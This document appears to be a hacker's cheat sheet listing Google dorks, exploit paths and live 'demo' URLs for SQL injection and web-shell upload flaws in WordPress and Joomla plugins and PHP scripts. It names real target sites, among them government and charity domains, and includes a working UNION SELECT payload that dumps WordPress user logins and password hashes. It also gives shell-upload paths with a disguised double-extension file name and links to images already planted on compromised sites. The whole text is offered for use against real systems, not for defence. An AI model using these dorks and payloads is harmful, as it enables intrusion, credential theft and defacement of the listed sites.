Dorks and Exploits
1. Espacio Ecuador
[ dork ]
intext:"developed by Espacio Ecuador" inurl:id=
[ demo ]
http://www.mytripecuador.com/ecuador-hotels/hotel.php?id=25
[ details ]
http://cxsecurity.com/issue/WLB-2012110228
2. Seventeen Design
[ dork ]
intext:"Producido por: Seventeen Design." inurl:id=
[ demo ]
http://www.monteavila.gob.ve/mae/detail_new.php?id=147'
[ details ]
http://cxsecurity.com/issue/WLB-2012110225
3. Plugin Wordpress Newsletter
[ dork ]
allinurl:stnl_iframe.php?newsletter=
[ demo ]
http://preventcancernow.ca/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=7
4. Plugin Wordpress Wp-Imagezoom
[ dork ]
allinurl:wp-imagezoom/zoom.php?id=
[ demo ]
http://asiasons.com/wp-content/plugins/wp-imagezoom/zoom.php?id=GnAaX
5. Wordpress Daily Edition Mouss
[ dork ]
inurl:fiche-artiste.php?id=
inurl:themes/dailyedition-mouss/fiche-artiste.php?id=
[ demo ]
http://hotnewrap.net/wp-content/themes/dailyedition-mouss/fiche-artiste.php?id=383
6. Wp-Plugin "Plg_Novana"
[ dork ]
inurl:novana_detail.php?**id=
[ exploit ]
/wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=[sql]
[ demo ]
http://avenuepattaya.net/wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=-35+union+select+1,2,3,4,5,6,7,8,9,group_concat%28user_login,user_pass%29,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users--
[ details ]
http://1337day.com/exploit/19787
7. Girl .php
[ dork ]
inurl:girl.php?id=
[ demo ]
http://www.btsfashionshow.com/girl.php?id=6
http://www.aramis-london-escorts.com/girl.php?id=301
http://www.pornescort.xxx/girl.php?id=68
8. Like .php
[ dork ]
inurl:like.php?id= intext:LikeItNow Script © 2010
[ demo ]
http://neonapster.net23.net/like.php?id=34%27
Tamper Data
1. Joomla Component com_smartformer
[ dork ]
inurl:index.php?option=com_smartformer inurl:itemid= intext:Upload
[ demo ]
http://www.goodarch2u.com.my/index.php?option=com_smartformer&Itemid=439&lang=en
http://www.finenge.com/en/index.php?option=com_smartformer&Itemid=90
[ shell location ]
site/components/com_smartformer/files/yournameshell.php
[ details ]
http://1337day.com/exploit/19825
2. Plugin Wordpress Zarzadzanie Kontem (Ajax File Manager)
[ dork ]
inurl:"ajaxfilemanager.php?page=" intitle:ajax file manager
[ demo ]
http://www.madiunkab.go.id/qwerty/filemanager/ajaxfilemanager.php?page=3
http://www.hacker-motor.com/javascript/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php?page=5
3. Wp-Plugin "tdo-mini-form"
[ dork ]
inurl:tdomf-upload-inline.php?tdomf_form_id= intext:Upload
[ link upload file ]
site/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(IP)/$filename.PHP;.jpg
[ example ]
wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP;.jpg
[ demo ]
http://www.tutufoundationusa.org/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
[ details ]
http://1337day.com/exploit/19776
4. jQuery File Upload
[ dork ]
intitle:upload intext:Add files.. "Start upload" Cancel upload Delete
[ vuln ]
http://konceptsigngroup.com/jQuery-FileUpload/index.html
[ demo ]
http://konceptsigngroup.com/jQuery-FileUpload/server/php/thumbnails/anonymous%20muslim.jpg
5. Upload Tiny Browser
[ new dork ]
inurl:tinybrowser/upload.php
intitle:Index of / intext:Parent Directory "tinybrowser/"
inurl:/tinybrowser/ intitle:TinyBrowser :: ext:php
inurl:tinybrowser/upload.php intext:Enviar Arquivos intitle:TinyBrowser :: Upload
inurl:type=image& intext:Enviar Arquivos intitle:TinyBrowser :: Upload
[ demo ]
http://www.maspa.com.br/clientes/lj/admin/js/tiny_mce/plugins/tinybrowser/upload.php
[ example ]
http://www.maspa.com.br/uploads/images/_thumbs/_anonymous_muslims.jpg
[ details ]
http://1337day.com/exploit/19732
6. Joomla File Upload "com_autostand"
[ dork ]
inurl:index.php?option=** func=newItem intext:Select Image Add a Car
inurl:index.php?option=** func=newItem intext:Select Image Publish Only available to admin
inurl:index.php?option=com_autostand
[ poc ]
site/inurl:index.php?option=com_autostand&func=newItem
[ demo ]
http://www.karahan.be/index.php?option=com_autostand&func=newItem
TAMPER DATA & SHELL UPLOAD
1. Plugin Spot Light
[ dork ]
intitle:index of /../plugins/spotlightyour/monetize/ intext:Parent Directory "upload/"
inurl:wp-content monetize/upload/ intext:Uploading Please wait ... Uploaded Successfully.
inurl:wp-content/plugins/spotlightyour/
[ exploit ]
http://site/wp-content/plugins/spotlightyour/monetize/upload/
[ shell access ]
wp-content/uploads/[year]/[month]/[search your shell].php
[ example ]
http://pure-cashmere-pashmina-scarves.com/wp-content/plugins/spotlightyour/monetize/upload/